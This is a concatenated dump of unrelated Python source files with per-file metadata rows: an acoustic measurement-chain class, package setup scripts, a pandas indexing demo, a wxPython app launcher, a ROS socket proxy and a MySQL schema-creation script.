unit : str, optional
"""
# check if device_data is type Signal or None
if not isinstance(data, (Signal, type(None))):
raise TypeError('Input data must be type Signal or None.')
# check if there are no devices in measurement chain
if not self.devices == []:
# check if sampling_rate of new device and MeasurementChain
# is the same
if data is not None:
if not self.sampling_rate == data.sampling_rate:
raise ValueError("Sampling rate of the new device does"
"not agree with the measurement chain.")
# add device to chain
new_device = Device(name, data=data,
sens=sens, unit=unit)
self.devices.append(new_device)
self._freq()
def list_devices(self):
"""Returns a list of names of all devices in the measurement chain.
"""
# list all ref-objects in chain
device_names = []
for dev in self.devices:
name = dev.name
device_names.append(name)
return device_names
def remove_device(self, num):
"""Removes a single device from the measurement chain,
by name or number.
Attributes
----------
num : int or str
Identifier for device to remove. Device can be found by name as
string or by number in device list as int.
"""
# remove ref-object in chain position num
if isinstance(num, int):
self.devices.pop(num)
# remove ref-object in chain by name
elif isinstance(num, str):
self.remove_device(self._find_device_index(num))
else:
raise TypeError("device to remove must be int or str")
self._freq()
# reset complete ref-object-list
def reset_devices(self):
"""Resets the list of devices in the measurement chain.
Other global parameters such as sampling rate or sound device of the
measurement chain remain unchanged.
"""
self.devices = []
self._freq()
# get the freq-response of specific device in measurement chain
def device_freq(self, num):
"""Returns the frequency response of a single device from the
measurement chain, by name or number.
Attributes
----------
num : int or str
Identifier for device, can be name as string or by number
in device list as int.
"""
if isinstance(num, int):
return self.devices[num].freq
elif isinstance(num, str):
return self.device_freq(self._find_device_index(num))
else:
raise TypeError("Device must be called by int or str.")
# get the freq-response of whole measurement chain as pyfar.Signal
@property
def freq(self):
"""Returns the frequency response of the complete measurement chain.
All devices (frequency response and sensitivity) are considered.
"""
return self._resp
def __repr__(self):
"""String representation of MeasurementChain class.
"""
repr_string = (
f"measurement chain with {len(self.devices)} devices "
f"@ {self.sampling_rate} Hz sampling rate.\n")
for i, dev in enumerate(self.devices):
repr_string = f"{repr_string}# {i:{2}}: {dev}"
return repr_string
| 34.803448 | 83 | 0.574458 | 1,221 | 10,093 | 4.683866 | 0.164619 | 0.053156 | 0.036545 | 0.01154 | 0.273649 | 0.216996 | 0.205456 | 0.141633 | 0.088477 | 0.07239 | 0 | 0.001215 | 0.347766 | 10,093 | 289 | 84 | 34.923875 | 0.867538 | 0.377192 | 0 | 0.304636 | 1 | 0 | 0.132646 | 0.008179 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139073 | false | 0 | 0.013245 | 0 | 0.251656 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69ab8661fbcc312d7db1662206a4daeec8008df9 | 482 | py | Python | setup.py | Chichilele/algorithms | acc7470631b3ced2a8e126011af1e6ff1ff62394 | [
"MIT"
] | null | null | null | setup.py | Chichilele/algorithms | acc7470631b3ced2a8e126011af1e6ff1ff62394 | [
"MIT"
] | null | null | null | setup.py | Chichilele/algorithms | acc7470631b3ced2a8e126011af1e6ff1ff62394 | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
with open("README.md", "r") as fh:
long_description = fh.read()
setup(
name="algorithms",
version="0.1",
description="Implements a few optimisation algorithms",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/chichilele/algorithms",
packages=find_packages(),
entry_points={"console_scripts": ["root_finding=algorithms.root_finding:cli"]},
)
| 28.352941 | 83 | 0.728216 | 58 | 482 | 5.844828 | 0.706897 | 0.176991 | 0.112094 | 0.176991 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004819 | 0.139004 | 482 | 16 | 84 | 30.125 | 0.812048 | 0 | 0 | 0 | 0 | 0 | 0.354772 | 0.082988 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69ac26e95480ef9ba55d71661068918c6ae8a979 | 2,445 | py | Python | pandas_loc_iloc.py | tseth92/pandas_experiments | ab26e0c6004546bea1ebdbe8807a6d4014189e64 | [
"MIT"
] | null | null | null | pandas_loc_iloc.py | tseth92/pandas_experiments | ab26e0c6004546bea1ebdbe8807a6d4014189e64 | [
"MIT"
] | null | null | null | pandas_loc_iloc.py | tseth92/pandas_experiments | ab26e0c6004546bea1ebdbe8807a6d4014189e64 | [
"MIT"
] | null | null | null | '''
This code compares the loc and iloc in pandas dataframe
'''
__author__ = "Tushar SEth"
__email__ = "tusharseth93@gmail.com"
import pandas as pd
import timeit
df_test = pd.DataFrame()
tlist = []
tlist2 = []
################ this code creates a dataframe df_test ##################
###############with two columns and 5000000 entries #####################
for i in range (0,50):
tlist.append(i)
tlist2.append(i+5)
df_test['A'] = tlist
df_test['B'] = tlist2
print('Original Dataframe:')
print(df_test.head(5))
print("-----------------")
######################### Done creating DF ##############################
############################ iloc #######################################
print('iloc dataframe: 3rd row and 1st to 2nd column:')
# since iloc ignores the last part of slice
# iloc works with only numbers for columns
print(df_test.iloc[2:3,0:2])
print("-----------------")
print('loc dataframe: 3rd row and 1st to 2nd column:')
# since loc includes the last part of slice
# loc works with only column names
print(df_test.loc[2:3,['A','B']])
print("-----------------")
######################### Done iloc ####################################
##########*******************************************####################
# ***** Observing loc and iloc when index is different ********** #
##########*******************************************####################
'''
Now the index is altered for dataframe which gives the actual difference
between what loc and iloc varies with in terms of rows. while iloc works
by checking index number and counting from start, loc works by checking
where the index label comes. eg. index: (4,5,6,1,2), iloc considers 2
index at 2nd position whereas loc considers it at 5th position
'''
############################### changing index ##########################
as_list = df_test.index.tolist()
print(as_list[3:7])
as_list[0:5] = [63,64,65,66,67]
for i in range(5,len(as_list)):
as_list[i] = as_list[i]-5
df_test.index = as_list
########################################################################
print('-----------------Dataframe after index updated -------------- ')
print(df_test.head(10))
print('-------------- iloc dataframe with updated index-------------')
print(df_test.iloc[:7]) # iloc watches for 7 index counts from start
print('-------------- loc dataframe with updated index-------------')
print(df_test.loc[:7]) # loc watches for index=7 where it appears
| 33.958333 | 73 | 0.521472 | 307 | 2,445 | 4.065147 | 0.37785 | 0.057692 | 0.052885 | 0.017628 | 0.145833 | 0.116987 | 0.116987 | 0.059295 | 0.059295 | 0 | 0 | 0.027506 | 0.122699 | 2,445 | 71 | 74 | 34.43662 | 0.554312 | 0.235992 | 0 | 0.090909 | 0 | 0 | 0.363203 | 0.045758 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.060606 | 0 | 0.060606 | 0.484848 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
69ae65d2b4f7488006dab65f0a909611be5333f5 | 2,061 | py | Python | felapps/apps/dataworkshop/dataworkshop.py | archman/felapps | 89532a592070d2a0cf07f0f2b4c723cbf1c1bd33 | [
"MIT"
] | 2 | 2018-04-01T14:37:39.000Z | 2021-03-12T04:16:12.000Z | felapps/apps/dataworkshop/dataworkshop.py | Archman/felapps | 89532a592070d2a0cf07f0f2b4c723cbf1c1bd33 | [
"MIT"
] | null | null | null | felapps/apps/dataworkshop/dataworkshop.py | Archman/felapps | 89532a592070d2a0cf07f0f2b4c723cbf1c1bd33 | [
"MIT"
] | 2 | 2016-07-10T11:14:33.000Z | 2019-07-06T05:42:10.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
DataWorkshop: application to handle data, e.g. generated from imageviewer
Author: Tong Zhang
Created: Sep. 23rd, 2015
"""
from ...utils import datautils
from ...utils import miscutils
from ...utils import funutils
from ...utils import resutils
import wx
import wx.lib.mixins.inspection as wit
import os
__version__ = miscutils.AppVersions().getVersion('dataworkshop')
__author__ = "Tong Zhang"
class InspectApp(wx.App, wit.InspectionMixin):
def OnInit(self):
self.Init()
#configFile = os.path.expanduser("~/.felapps/config/imageviewer.xml")
#if not os.path.isfile(configFile):
# configFile = funutils.getFileToLoad(None, ext = 'xml')
myframe = datautils.DataWorkshop(None, config=None, title=u'DataWorkshop \u2014 Data Analysis Framwork (debug mode, CTRL+ALT+I)', appversion = __version__, style = wx.DEFAULT_FRAME_STYLE)
myframe.Show()
myframe.SetIcon(resutils.dicon_s.GetIcon())
self.SetTopWindow(myframe)
return True
def run(maximize = True, logon = False, debug=True):
"""
function to make dataworkshop app run.
"""
if debug == True:
app = InspectApp()
app.MainLoop()
else:
app = wx.App(redirect=logon, filename='log')
#configFile = os.path.expanduser("~/.felapps/config/imageviewer.xml")
#if not os.path.isfile(configFile):
# configFile = funutils.getFileToLoad(None, ext = 'xml')
if maximize == True:
myframe = datautils.DataWorkshop(None, config=None, title=u'DataWorkshop \u2014 Data Analysis Framwork', appversion=__version__, style=wx.DEFAULT_FRAME_STYLE)
else:
myframe = datautils.DataWorkshop(None, config=None, title = u'DataWorkshop \u2014 Data Analysis Framwork', appversion=__version__, style=wx.DEFAULT_FRAME_STYLE & ~(wx.RESIZE_BORDER | wx.MAXIMIZE_BOX))
myframe.Show()
myframe.SetIcon(resutils.dicon_s.GetIcon())
app.MainLoop()
if __name__ == '__main__':
run()
| 34.35 | 212 | 0.675885 | 241 | 2,061 | 5.622407 | 0.410788 | 0.026568 | 0.04428 | 0.070849 | 0.525461 | 0.525461 | 0.525461 | 0.495203 | 0.427306 | 0.427306 | 0 | 0.011522 | 0.199903 | 2,061 | 59 | 213 | 34.932203 | 0.810188 | 0.252305 | 0 | 0.25 | 1 | 0 | 0.121774 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.21875 | 0 | 0.34375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69b2168377003bbbd37472a46ea76cd577d96277 | 1,082 | py | Python | setup.py | ysatapathy23/TomoEncoders | 6f3f8c6dd088e4df968337e33a034a42d1f6c799 | [
"BSD-3-Clause"
] | null | null | null | setup.py | ysatapathy23/TomoEncoders | 6f3f8c6dd088e4df968337e33a034a42d1f6c799 | [
"BSD-3-Clause"
] | null | null | null | setup.py | ysatapathy23/TomoEncoders | 6f3f8c6dd088e4df968337e33a034a42d1f6c799 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: atekawade
"""
from setuptools import setup, find_packages
setup(
# Needed to silence warnings (and to be a worthwhile package)
name='tomo_encoders',
url='https://github.com/aniketkt/TomoEncoders',
author='Aniket Tekawade',
author_email='atekawade@anl.gov',
# Needed to actually package something
packages= ['tomo_encoders', 'tomo_encoders.neural_nets', 'tomo_encoders.misc', 'tomo_encoders.structures', 'tomo_encoders.tasks', 'tomo_encoders.rw_utils', 'tomo_encoders.reconstruction', 'tomo_encoders.labeling','tomo_encoders.mesh_processing'],
# Needed for dependencies
install_requires=['numpy', 'pandas', 'scipy', 'h5py', 'matplotlib', \
'opencv-python', 'scikit-image',\
'ConfigArgParse', 'tqdm', 'ipython', 'seaborn'],
version=open('VERSION').read().strip(),
license='BSD',
description='Representation learning for latent encoding of morphology in 3D tomographic images',
# long_description=open('README.md').read(),
)
| 38.642857 | 250 | 0.682994 | 121 | 1,082 | 5.966942 | 0.727273 | 0.166205 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004435 | 0.166359 | 1,082 | 27 | 251 | 40.074074 | 0.796009 | 0.212569 | 0 | 0 | 0 | 0 | 0.554361 | 0.179211 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.071429 | 0 | 0.071429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69b54d1f2fc387e83bb92bd862115b2d1c6f2876 | 7,728 | py | Python | ROS/src/spiderplan_proxy/src/spiderplan_proxy.py | uwe-koeckemann/SpiderPlan | ae8666967ee9e4d3563c43934823f65e72f1d9ce | [
"MIT"
] | null | null | null | ROS/src/spiderplan_proxy/src/spiderplan_proxy.py | uwe-koeckemann/SpiderPlan | ae8666967ee9e4d3563c43934823f65e72f1d9ce | [
"MIT"
] | null | null | null | ROS/src/spiderplan_proxy/src/spiderplan_proxy.py | uwe-koeckemann/SpiderPlan | ae8666967ee9e4d3563c43934823f65e72f1d9ce | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#Copyright (c) 2015 Uwe Köckemann <uwe.kockemann@oru.se>
#Permission is hereby granted, free of charge, to any person obtaining
#a copy of this software and associated documentation files (the
#"Software"), to deal in the Software without restriction, including
#without limitation the rights to use, copy, modify, merge, publish,
#distribute, sublicense, and/or sell copies of the Software, and to
#permit persons to whom the Software is furnished to do so, subject to
#the following conditions:
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
#EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
#MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
#NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
#LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
#WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import fileinput
import socket
import os
import signal
import sys
import time
import rospy
import actionlib
from std_msgs.msg import *
from geometry_msgs.msg import *
from actionlib_tutorials.msg import *
import ROSMessageConversion
import ROSMessageConversion as msg_conv
currentTicket = 0
nextFreeTicket = 0
lastMessage = {}
publishers = {}
publisherMsg = {}
subscriberVar = {}
nextRequestID = 0
actionClientMap = {}
someone_writing = False
def give_back_ticket():
if nextFreeTicket > 0:
nextFreeTicket -= 1
# Provide callbacks with an ID:
class CallbackProvider:
def __init__(self,requestID):
self.requestID = requestID
def done_cb(self,state,data):
lastMessage[(self.requestID,"done")] = msg_conv.get_str_from_ros_msg("done", data)
def active_cb(self):
lastMessage[(self.requestID,"active")] = True
def feedback_cb(self,data):
lastMessage[(self.requestID,"feedback")] = msg_conv.get_str_from_ros_msg("feedback", data)
# Provide callbacks that know their topic name:
class SubscriberCallbackProvider:
def __init__(self,topicName):
self.topicName = topicName
def callback(self,data):
lastMessage[self.topicName] = msg_conv.get_str_from_ros_msg(subscriberVar[self.topicName],data)
def reg_simple_action_client(server_name,action_name):
print "Registering action", action_name, " at ", server_name
print rospy.get_name()
client = actionlib.SimpleActionClient(server_name, msg_conv.rosClassMap[action_name])
client.wait_for_server()
actionClientMap[(server_name,action_name)] = client
def send_goal(server_name,action_name,goal_msg_str):
global nextRequestID
cbp = CallbackProvider(nextRequestID)
nextRequestID += 1
print goal_msg_str
goal = ROSMessageConversion.create_ros_msg_from_str(goal_msg_str)[1]
client = actionClientMap[(server_name,action_name)]
client.send_goal(goal,feedback_cb=cbp.feedback_cb,done_cb=cbp.done_cb,active_cb=cbp.active_cb)
nextRequestID += 1
return cbp.requestID
def subscribe(topicName,msgType,varName):
print "SUBSCRIBE_TO:", topicName, msgType, varName
subscriberVar[topicName] = varName
#rospy.Subscriber(topicName.replace("/",""), msg_conv.rosClassMap.get(msgType), callback)
cbp = SubscriberCallbackProvider(topicName)
rospy.Subscriber(topicName, msg_conv.rosClassMap.get(msgType), cbp.callback)
def publish(topicName,msgType):
#publishers[topicName] = rospy.Publisher(topicName.replace("/",""), msg_conv.rosClassMap.get(msgType), queue_size=10)
publishers[topicName] = rospy.Publisher(topicName, msg_conv.rosClassMap.get(msgType), queue_size=10)
publisherMsg[topicName] = msgType
def send_msg(topicName,msg):
publishers[topicName].publish(msg_conv.create_ros_msg_from_str(msg)[1])
def signal_handler(signal, frame):
print('Caught Ctrl+C. Closing socket...')
conn.close()
s.close()
sys.exit(0)
def ros_service_call(arg_msgs):
request = msg_conv.create_ros_msg_from_str(arg_msgs)[1]
service_name = arg_msgs[1:].split(" ")[0]
rospy.wait_for_service(service_name)
try:
serviceProxy = rospy.ServiceProxy(service_name, ROSMessageConversion.rosServiceMap[service_name])
print "Request:\n", request
response = serviceProxy.call(request)
responseStr = ROSMessageConversion.get_str_from_ros_msg("response",response)
#responseStr = ROSMessageConversion.split(responseStr[1:len(responseStr)-1])[2]
print "Response:\n",responseStr
return responseStr
except rospy.ServiceException, e:
print "Service call failed: %s"%e
signal.signal(signal.SIGINT, signal_handler)
TCP_IP = '127.0.0.1'
TCP_PORT = 6790
BUFFER_SIZE = 1024
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((TCP_IP, TCP_PORT))
s.listen(1)
rospy.init_node("SpiderPlanROSProxy", anonymous=True)
ros_namespace = rospy.get_namespace()
print ros_namespace
SUBSCRIBE_TO = 0
PUBLISH_TO = 1
READ_MSG = 2
SEND_MSG = 3
SERVICE_CALL = 4
REGISTER_ACTION = 5
SEND_GOAL = 6
HAS_STARTED = 7
HAS_FINISHED = 8
splitStr = "<//>"
while 1:
#print "Waiting..."
conn, addr = s.accept()
startAll = time.time()
#print 'Connection address:', addr
data = ""
while not "\n" in data:
data += conn.recv(BUFFER_SIZE)
data = data.replace("\n","")
print 'Request:', data.replace(splitStr,"|")
reqType = int(data.split(splitStr)[0])
returnMessage = ""
if reqType == SUBSCRIBE_TO:
topicName = ros_namespace + data.split(splitStr)[1]
topicName = topicName.replace("//", "/")
msgType = data.split(splitStr)[2]
varName = data.split(splitStr)[3]
subscribe(topicName,msgType,varName)
returnMessage = "<OK>"
elif reqType == PUBLISH_TO:
topicName = ros_namespace + "/"+data.split(splitStr)[1]
topicName = topicName.replace("//", "/")
msgType = data.split(splitStr)[2]
publish(topicName,msgType)
returnMessage = "<OK>"
elif reqType == READ_MSG:
topicName = ros_namespace + data.split(splitStr)[1]
if topicName in lastMessage.keys():
returnMessage = lastMessage[topicName]
lastMessage[topicName] = "<NONE>"
else:
returnMessage = "<NONE>"
elif reqType == SEND_MSG:
topicName = ros_namespace + data.split(splitStr)[1]
#topicName = topicName.replace("//", "/")
msg = data.split(splitStr)[2]
send_msg(topicName,msg)
returnMessage = "<OK>"
elif reqType == SERVICE_CALL:
request = data.split(splitStr)[1]
ros_service_call(request)
returnMessage = ros_service_call(request)
elif reqType == REGISTER_ACTION:
server_name = data.split(splitStr)[1]
action_name = data.split(splitStr)[2]
reg_simple_action_client(server_name,action_name)
returnMessage = "<OK>"
elif reqType == SEND_GOAL:
server_name = data.split(splitStr)[1]
action_name = data.split(splitStr)[2]
goal_msg_str = data.split(splitStr)[3]
requestID = send_goal(server_name,action_name,goal_msg_str)
returnMessage = str(requestID)
elif reqType == HAS_STARTED:
requestID = int(data.split(splitStr)[1])
if (requestID,"active") in lastMessage.keys():
returnMessage = "true"
else:
returnMessage = "false"
elif reqType == HAS_FINISHED:
requestID = int(data.split(splitStr)[1])
if (requestID,"done") in lastMessage.keys():
returnMessage = lastMessage[(requestID,"done")]
else:
returnMessage = "false"
elif reqType == "get_feedback":
requestID = int(data.split(splitStr)[1])
if (requestID,"feedback") in lastMessage.keys():
returnMessage = lastMessage[(requestID,"feedback")]
else:
returnMessage = "<NONE>"
conn.send(returnMessage)
conn.close()
endAll = time.time()
print 'Response: %s (took %.2fs)' % (returnMessage,endAll-startAll)
| 29.38403 | 118 | 0.749482 | 1,021 | 7,728 | 5.513222 | 0.260529 | 0.02878 | 0.054361 | 0.031977 | 0.245337 | 0.20803 | 0.167525 | 0.13537 | 0.077101 | 0.063599 | 0 | 0.010435 | 0.131988 | 7,728 | 262 | 119 | 29.496183 | 0.828712 | 0.200699 | 0 | 0.170455 | 0 | 0 | 0.051382 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.073864 | null | null | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
69c0ea03d21d79afcf9d113b44197d452321d747 | 16,034 | py | Python | Createmodele_V13_1.1.py | pad-awan/domotiquesante | c91d97065bfcf9816367263266c608cfdc0c8009 | [
"CNRI-Python"
] | null | null | null | Createmodele_V13_1.1.py | pad-awan/domotiquesante | c91d97065bfcf9816367263266c608cfdc0c8009 | [
"CNRI-Python"
] | null | null | null | Createmodele_V13_1.1.py | pad-awan/domotiquesante | c91d97065bfcf9816367263266c608cfdc0c8009 | [
"CNRI-Python"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Jan 09 22:25:07 2019
@author: arnaudhub
"""
#import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.sql import text
import configparser,os
from urllib import parse
#import sql.connector
config = configparser.ConfigParser()
config.read_file(open(os.path.expanduser("~/Bureau/OBJDOMO.cnf")))
DB = "OBJETDOMO_V13_1.1?charset=utf8"
CNF="OBJDOMO"
engine = create_engine("mysql://%s:%s@%s/%s" % (config[CNF]['user'], parse.quote_plus(config[CNF]['password']), config[CNF]['host'], DB))
user = config['OBJDOMO']['user']
password=config['OBJDOMO']['password']
import mysql.connector
from mysql.connector import Error
try:
connection = mysql.connector.connect(host="127.0.0.1",
database="OBJETDOMO_V13_1.1",
user=user,
password=password)
cursor = connection.cursor()
cursor.execute("""SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;""")
cursor.execute("""SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;""")
cursor.execute("""SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';""")
cursor.execute("""DROP SCHEMA IF EXISTS `OBJETDOMO_V13_1.1`;""")
print("DROP SCHEMA")
cursor.execute("""CREATE SCHEMA IF NOT EXISTS `OBJETDOMO_V13_1.1` DEFAULT CHARACTER SET utf8 ;""")
cursor.execute("""USE `OBJETDOMO_V13_1.1`;""")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` (
`TAD_ID` INT NOT NULL AUTO_INCREMENT,
`TAD_LIBELLE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`TAD_ID`))
ENGINE = InnoDB;""")
print("T_A_TYPE_ADRESSE_TAD Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` (
`GEN_ID` INT NOT NULL AUTO_INCREMENT,
`GEN_LIBELLE` VARCHAR(16) NOT NULL,
PRIMARY KEY (`GEN_ID`))
ENGINE = InnoDB;""")
print("T_R_GENRE_GEN Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` (
`STT_ID` INT NOT NULL AUTO_INCREMENT,
`STT_LIBELLE` VARCHAR(45) NOT NULL,
`STT_TYPE` VARCHAR(45) NOT NULL,
PRIMARY KEY (`STT_ID`))
ENGINE = InnoDB;""")
print("T_A_STATUT_STT Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PERSONNEPHYSIQUE_PRS` (
`PRS_ID` INT NOT NULL AUTO_INCREMENT,
`PRS_NOM` VARCHAR(40) NOT NULL,
`PRS_PRENOM` VARCHAR(40) NOT NULL,
`GEN_ID` INT NOT NULL,
`PRS_NOTES` VARCHAR(300) NULL,
`STT_ID` INT NOT NULL,
PRIMARY KEY (`PRS_ID`),
INDEX `fk_TE_PERSONNE_PRS_1_idx` (`GEN_ID` ASC),
INDEX `fk_TE_PERSONNE_PRS_2_idx` (`STT_ID` ASC),
INDEX `index4` (`PRS_NOM` ASC, `PRS_PRENOM` ASC),
CONSTRAINT `fk_TE_PERSONNE_PRS_1`
FOREIGN KEY (`GEN_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_R_GENRE_GEN` (`GEN_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_PERSONNE_PRS_2`
FOREIGN KEY (`STT_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_STATUT_STT` (`STT_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_PERSONNEPHYSIQUE_PRS Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` (
`CITY_ID` INT NOT NULL AUTO_INCREMENT,
`CITY_CODEPOSTAL` CHAR(5) NOT NULL,
`CITY_COMMUNE` VARCHAR(60) NOT NULL,
PRIMARY KEY (`CITY_ID`),
INDEX `index2` (`CITY_CODEPOSTAL` ASC, `CITY_COMMUNE` ASC))
ENGINE = InnoDB;""")
print("T_A_VILLE_CITY Table created successfully ")
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_ADRESSEPOSTALE_ADR` (
`ADR_ID` INT NOT NULL AUTO_INCREMENT,
`ADR_VOIEPRINCIPALE` VARCHAR(38) NOT NULL,
`ADR_COMPLEMENTIDENTIFICATION` VARCHAR(38) NOT NULL,
`CITY_ID` INT NOT NULL,
`TAD_ID` INT NOT NULL COMMENT ' ',
PRIMARY KEY (`ADR_ID`),
INDEX `fk_TE_ADRESSE_ADR_1_idx` (`TAD_ID` ASC),
INDEX `fk_TE_ADRESSEPOSTALE_ADR_1_idx` (`CITY_ID` ASC),
CONSTRAINT `fk_TE_ADRESSE_ADR_1`
FOREIGN KEY (`TAD_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_TYPE_ADRESSE_TAD` (`TAD_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION,
CONSTRAINT `fk_TE_ADRESSEPOSTALE_ADR_1`
FOREIGN KEY (`CITY_ID`)
REFERENCES `OBJETDOMO_V13_1.1`.`T_A_VILLE_CITY` (`CITY_ID`)
ON DELETE NO ACTION
ON UPDATE NO ACTION)
ENGINE = InnoDB;""")
print('T_E_ADRESSEPOSTALE_ADR Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_R_TYPEPRODUIT_TPDT` (
`TPDT_ID` INT NOT NULL AUTO_INCREMENT,
`TPDT_CATEGORIE` VARCHAR(60) NULL,
PRIMARY KEY (`TPDT_ID`))
ENGINE = InnoDB;""")
print('T_R_TYPEPRODUIT_TPDT Table created successfully')
cursor.execute("""DROP TABLE IF EXISTS `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` ;""")
cursor.execute("""CREATE TABLE IF NOT EXISTS `OBJETDOMO_V13_1.1`.`T_E_PRODUIT_PDT` (
`PDT_SERIALNUMBER` INT NOT NULL AUTO_INCREMENT,
`PDT_NOM` VARCHAR(45) NOT NULL,
`PDT_MARQUE` VARCHAR(45) NOT NULL,
`PDT_VALEUR` VARCHAR(45) NOT NULL,
`PDT_HEURE` VARCHAR(45) NOT NULL,
`PDT_DUREE` VARCHAR(45) NOT NULL,
`PDT_SOURCE` VARCHAR(45) NOT NULL,
`PDT_REGLE` VARCHAR(45) NOT NULL,
`TPDT_ID` INT NOT NULL,
PRIMARY KEY (`PDT_SERIALNUMBER`),
INDEX `index2` (`PDT_NOM` ASC, `PDT_MARQUE` ASC),
INDEX `fk_TE_PRODUIT_PDT_1_idx` (`TPDT_ID` ASC),
CONSTRAINT `fk_TE_PRODUIT_PDT_1`
